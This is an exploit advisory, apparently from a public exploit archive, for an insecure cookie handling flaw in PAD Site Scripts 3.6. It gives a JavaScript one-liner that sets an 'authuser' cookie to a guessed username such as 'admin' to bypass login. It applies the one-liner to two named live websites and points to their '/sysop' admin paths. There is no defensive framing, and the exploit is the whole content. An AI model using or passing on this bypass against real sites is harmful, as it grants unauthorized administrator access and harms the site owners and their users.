id: 5207
date: 05/18/2009
title: PAD Site Scripts 3.6 Insecure Cookie Handling Vulnerability
author: Mr.tro0oqy
cves: 

===========================================================
PAD Site Scripts 3.6 Insecure Cookie Handling Vulnerability 
===========================================================



=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :PAD Site Scripts v3.6 Insecure Cookie Handling Vulnerability

[+] Found by : Mr.tro0oqy  
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
--------
javascript:document.cookie="authuser=[demo];path=/";

[demo]= Guess the username to the login

demo:
-----
Username for this site 'demo'

javascript:document.cookie="authuser=demo;path=/";

http://demo.pad-site-scripts.com/sysop

demo2:
------
Username for this site 'admin'

javascript:document.cookie="authuser=admin;path=/";

http://www.unlimitedpcdownloads.com/sysop/


=======================================================



#  0day.today [2023-03-21]  #